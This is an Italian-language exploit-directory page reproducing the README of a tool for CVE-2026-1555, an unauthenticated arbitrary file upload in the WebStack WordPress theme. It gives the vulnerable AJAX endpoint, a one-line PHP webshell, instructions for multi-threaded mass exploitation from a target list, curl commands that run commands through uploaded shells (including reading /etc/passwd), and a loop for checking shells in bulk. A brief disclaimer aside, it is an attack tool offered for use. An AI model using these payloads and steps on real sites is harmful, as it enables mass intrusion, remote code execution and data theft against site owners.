Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-1555 — WebStack <= 1.2024 - Caricamento arbitrario di file senza autenticazione | Kitploit
Strumenti/GitHubGitHub/nxploited/cve-2026-1555
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingStrumento di Accesso Remoto
GitHubnxploited/cve-2026-1555

CVE-2026-1555

WebStack <= 1.2024 - Caricamento arbitrario di file senza autenticazione

Vedi Repository
914 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-1555

WebStack <= 1.2024 - Caricamento Arbitrario di File Non Autenticato

👤 By: Nxploited

🔗 Nxploited ZeroDay Hub — t.me/KNxploited


💀 CVE-2026-1555 — WebStack WordPress Caricamento Arbitrario di File

Esecuzione Remota di Codice Non Autenticata tramite il gestore AJAX img_upload

Python CVE CVSS Auth


📌 Panoramica della Vulnerabilità

🔬 Causa Tecnica Principale

La funzione io_img_upload() registrata nell'hook d'azione img_upload di WordPress admin-ajax.php non esegue alcuna validazione del tipo di file o dell'estensione prima di scrivere il file caricato sul server. Poiché l'azione è registrata senza controlli di autenticazione (wp_ajax_nopriv_), qualsiasi attaccante remoto non autenticato può inviare un file arbitrario — inclusa una webshell PHP — e il server lo memorizzerà in un percorso accessibile pubblicamente, consentendo l'esecuzione remota di codice diretta.

Endpoint vulnerabile:

root@kitploit:~
POST /wp-admin/admin-ajax.php
action=img_upload
files=@<payload>

⚙️ Funzionalità dello Strumento

  • 🔁 Scansione multi-thread con numero di worker configurabile
  • 📋 Supporto per target multipli tramite file di elenco target
  • 📤 Estrazione automatica dell'URL della shell dalla risposta JSON
  • 💾 URL delle shell riuscite salvati in uploaded_paths.txt
  • 🎨 Interfaccia terminale ricca con monitoraggio dell'avanzamento in tempo reale
  • 🔕 Verifica SSL disattivata per la massima compatibilità

📦 Requisiti

Versione Python: 3.8+

Installa le dipendenze:

root@kitploit:~
pip install requests rich urllib3

🚀 Utilizzo

1. Prepara il tuo elenco di target

Crea un file chiamato list.txt (o qualsiasi altro nome preferisci) con un target per riga:

root@kitploit:~
https://target1.com
https://target2.com
http://target3.com

I target senza http:// o https:// vengono automaticamente preceduti da http://.

2. Prepara il tuo payload

Posiziona la tua webshell nella stessa directory dello script. Esempio:

root@kitploit:~
# Minima webshell PHP
echo '<?php system($_GET["cmd"]); ?>' > shell.php

3. Esegui lo strumento

root@kitploit:~
python CVE-2026-1555.py

Ti verranno richiesti:


📤 Output ed Estrazione della Shell

Output in Tempo Reale

Ogni caricamento riuscito stampa:

root@kitploit:~
╭─ IMG_UPLOAD ──────────────────────────────────╮
│ Upload successful                              │
│                                                │
│ Target:    https://target.com                  │
│ Shell URL: https://target.com/wp-content/...   │
╰────────────────────────────────────────────────╯

Risultati Salvati

Tutti gli URL delle shell riuscite vengono aggiunti a:

root@kitploit:~
uploaded_paths.txt

Accesso alla Tua Shell

Dopo un caricamento riuscito, accedi alla shell direttamente tramite browser o curl:

root@kitploit:~
# Browser
https://target.com/wp-content/uploads/shell.php?cmd=id

# curl
curl "https://target.com/wp-content/uploads/shell.php?cmd=whoami"

# Esecuzione completa dei comandi
curl "https://target.com/wp-content/uploads/shell.php?cmd=cat+/etc/passwd"

Il percorso esatto di caricamento viene estratto dalla risposta JSON del server (data.src) e stampato automaticamente.

Verifica di Massa delle Shell

Verifica rapidamente tutte le shell caricate dal file di output:

root@kitploit:~
while read url; do
  echo -n "[*] $url -> "
  curl -sk "$url?cmd=id" 2>/dev/null || echo "DEAD"
done < uploaded_paths.txt

📊 Riepilogo dell'Output

Al termine di ogni esecuzione, viene stampato un riepilogo:

root@kitploit:~
Summary  50/50  OK: 12  FAIL: 38
╭──────────────────────────────────────────╮
│  Shell URLs saved to uploaded_paths.txt  │
╰──────────────────────────────────────────╯

🗂️ Struttura dei File

root@kitploit:~
CVE-2026-1555.py       ← Main exploit script
list.txt               ← Target URLs (one per line)
shell.php              ← Payload to upload
uploaded_paths.txt     ← Auto-generated: successful shell URLs

⚠️ Disclaimer

Questo strumento è fornito esclusivamente per test di penetrazione autorizzati, ricerca sulla sicurezza e scopi educativi.

L'autore — Nxploited — non si assume alcuna responsabilità per usi impropri, danni o attività illegali compiute con questo strumento. Utilizzando questo strumento, confermi di avere un'autorizzazione scritta esplicita per testare tutti i sistemi target.

L'uso non autorizzato contro sistemi che non possiedi o per i quali non hai il permesso esplicito di testare è illegale e può comportare un procedimento penale ai sensi delle leggi applicabili sui crimini informatici.

Usalo in modo responsabile. Sei l'unico responsabile delle tue azioni.


👤 Autore: Nxploited 📣 Canale: Nxploited ZeroDay Hub 💬 Telegram: @KNxploited

Scarica lo strumento
CampoDettaglio
ID CVECVE-2026-1555
Componente InteressatoTema WebStack per WordPress
Versioni VulnerabiliTutte le versioni fino alla 1.2024 inclusa
Tipo di VulnerabilitàCaricamento Arbitrario di File → Esecuzione Remota di Codice
Autenticazione Richiesta❌ Nessuna (Non autenticato)
Punteggio CVSS9.8 CRITICAL
Vettore CVSSCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CNAWordfence
PromptDescrizioneDefault
Targets filePercorso del tuo elenco di targetlist.txt
ThreadsNumero di worker concorrenti6
Local file to uploadNome del file del tuo payload (nella directory dello script)shell.php